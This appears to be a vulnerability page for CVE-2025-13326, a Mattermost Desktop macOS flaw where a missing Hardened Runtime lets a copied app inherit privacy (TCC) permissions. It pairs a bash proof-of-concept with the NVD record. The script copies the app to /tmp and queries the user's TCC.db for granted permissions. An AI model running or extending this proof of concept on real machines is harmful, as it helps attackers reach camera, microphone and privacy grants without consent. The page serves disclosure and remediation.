CVE-2025-13326

#!/bin/bash # CVE-2025-13326 PoC - Mattermost Desktop App TCC Permission Inheritance # This script demonstrates how Hardened Runtime bypass allows TCC permission inheritance MATERMOST_APP="/Applications/Mattermost.app" TEMP_DIR="/tmp/mattermost_poc_$$/Mattermost.app" echo "=== CVE-2025-13326 PoC ===" echo "Target: Mattermost Desktop App < 6.0.0" echo "Vulnerability: TCC Permission Inheritance via Hardened Runtime Bypass" echo "" # Step 1: Check if Mattermost is installed if [ ! -d "$MATERMOST_APP" ]; then echo "[-] Mattermost Desktop App not found at $MATERMOST_APP" exit 1 fi echo "[+] Found Mattermost Desktop App" # Step 2: Check if Hardened Runtime is enabled codesign_result=$(codesign -d "$MATERMOST_APP" 2>&1) echo "[i] Code signature info: $codesign_result" # Check for hardened runtime entitlement if codesign -d -v "$MATERMOST_APP" | grep -q "runtime"; then echo "[+] Hardened Runtime appears to be enabled" echo "[-] System may not be vulnerable" else echo "[-] Hardened Runtime NOT enabled - System is VULNERABLE" fi # Step 3: Copy application to temp directory (simulating attack) echo "" echo "[*] Simulating attack: Copying app to temp directory..." mkdir -p "/tmp/mattermost_poc_$$/" cp -R "$MATERMOST_APP" "$TEMP_DIR" if [ $? -eq 0 ]; then echo "[+] Successfully copied Mattermost to $TEMP_DIR" echo "[i] The copied app may inherit TCC permissions from the original" echo "[i] This allows an attacker to access camera/mic without new authorization" else echo "[-] Failed to copy application" fi # Step 4: Check TCC permissions echo "" echo "[*] Checking TCC permissions for Mattermost..." sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db \ "SELECT client, service, auth_value FROM access WHERE client LIKE '%Mattermost%';" 2>/dev/null # Cleanup echo "" echo "[*] Cleaning up..." rm -rf "/tmp/mattermost_poc_$$/" echo "[+] Done" echo "" echo "=== Remediation ===" echo "Upgrade to Mattermost Desktop App >= 6.0.0" echo "Ensure Hardened Runtime is enabled in production builds"

{"cve": {"id": "CVE-2025-13326", "sourceIdentifier": "[email protected]", "published": "2025-12-17T19:16:01.237", "lastModified": "2025-12-18T19:47:06.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost Desktop App versions <6.0.0 fail to enable the Hardened Runtime on the Mattermost Desktop App when packaged for Mac App Store which allows an attacker to inherit TCC permissions via copying the binary to a tmp folder."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 3.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_desktop:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.0.0", "matchCriteriaId": "6DD607D2-5B4D-49F7-AB83-2DAD88C94DB8"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}